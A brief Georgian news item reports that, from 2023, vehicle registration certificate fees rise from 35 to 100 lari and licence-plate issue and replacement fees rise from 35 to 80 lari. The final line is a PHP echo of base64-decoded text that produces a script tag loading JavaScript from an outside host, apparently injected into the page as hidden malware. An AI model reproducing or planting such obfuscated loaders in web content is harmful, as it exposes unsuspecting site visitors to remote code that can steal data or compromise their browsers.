celsiusi
ავერსი საქკაბელი

2023 წლიდან ავტომობილის რეგისტრაციის მოწმობისა და სანომრე ნიშნის საფასური იზრდება. საფასურის გაზრდას ითვალისწინებს მთავრობის მიერ მომზადებული და პარლამენტის მიერ დამტკიცებული კანონი, რომლის გათვალისწინებით, შინაგან საქმეთა სამინისტროს მომსახურების სააგენტოს რამდენიმე სახის მომსახურების საფასური იზრდება.

კანონის მიხედვით, პირველი იანვრიდან, სატრანსპორტო საშუალების რეგისტრაციის მოწმობის გაცემა − 35 ლარის ნაცვლად 100 ლარი იქნება; ავტომობილის სახელმწიფო სანომრე ნიშნის ერთი წყვილის გაცემა − 35 ლარის ნაცვლად 80 ლარი იქნება, ხოლო ავტომობილის დაკარგული ან დაზიანებული სანომრე ნიშნის ერთი წყვილის აღდგენის საფასური 35 ლარის ნაცვლად  80 ლარი იქნება.

299
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");